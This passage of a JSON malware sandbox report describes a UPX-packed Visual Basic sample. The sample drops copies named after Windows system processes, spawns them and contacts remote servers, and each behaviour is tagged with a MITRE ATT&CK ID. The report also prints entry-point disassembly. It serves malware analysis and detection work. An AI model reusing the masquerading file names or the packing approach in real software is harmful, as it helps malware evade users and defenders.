ADVAPI32.dll (UID: 00000000-00003492)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003492)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003136)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003136)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003136)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003136)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003136)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003136)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003136)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003136)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003136)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001200)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001200)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001200)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001200)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001200)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001200)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001200)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001200)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001200)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001200)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4k51k4.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4k51k4.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:443\"\n \"<IPv4>:80\"\n \"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76650000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76650000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76650000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76650000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76650000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76650000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76650000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76650000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"services.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"shell.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4k51k4.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IExplorer.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"New Folder.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Data HAPUBWS.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES .exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SMSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"LSASS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4K51K4.EXE.67A9DCB2.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MrHelloween.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67A9C389.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"WINLOGON.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"services.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"shell.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4k51k4.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"IExplorer.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"New Folder.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"Data HAPUBWS.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"SERVICES .exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"Empty.pif\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"SERVICES.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"SMSS.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"LSASS.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4K51K4.EXE.67A9DCB2.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"MrHelloween.scr\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"IEXPLORER.EXE.67A9C389.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"WINLOGON.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"4k51k4.exe\" (UID: 00000000-00005232)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003876)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004088)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002340)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005116)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003924)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005152)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005476)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005184)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005260)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005816)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005608)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005376)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005912)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005888)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005836)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004192)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005396)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00006052)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005696)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005820)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003336)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003160)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005692)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004340)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"4k51k4.exe\" (UID: 00000000-00005232)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003876)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004088)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002340)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005116)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003924)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005152)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005476)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005184)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005260)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005816)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005608)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005376)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005912)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005888)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005836)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004192)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005396)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00006052)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005696)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005820)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003336)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003160)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005692)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004340)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1\" was detected as \"UPX\" and name: \"Packer\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"services.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"services.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"services.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"shell.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"shell.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"shell.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4k51k4.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4k51k4.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4k51k4.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IExplorer.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"IExplorer.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IExplorer.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"New Folder.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"New Folder.exe\" was detected as \"Microsoft Visual Basic\" and 